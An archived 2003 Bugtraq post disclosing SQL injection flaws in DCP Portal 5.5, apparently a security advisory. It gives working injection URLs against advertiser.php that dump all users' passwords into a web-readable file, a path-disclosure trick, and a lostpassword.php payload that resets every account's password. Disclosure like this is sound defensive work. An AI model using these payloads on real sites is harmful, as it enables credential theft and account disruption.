lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 1 Oct 2003 12:08:25 -0000
From: Lifo Fifo <lifofifo20@...oo.com>
To: bugtraq@...urityfocus.com
Subject: DCP Portal - 5.5 holes




Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned off register_globals.

All the files in the product, dont check for integrity of variables. You can easily exploit this using some SQL Injection techniques. For example, if you want to get username/password of all the users, you can exploit advertiser.php. 

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In this cases, you will need to enter the absolute path. For that, run the follwing

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the path to the sever if they have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This will really cause some damage. It will reset password of everyone. Everyone will get as many mails as the number of users. And evryone's password will be the one provided in the last email.

I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch select-fish attacks, which would work even in case of magic_quotes_gpc is on.

Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in making DCP Portal.

-lifofifo
http://www.hackingzone.org/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ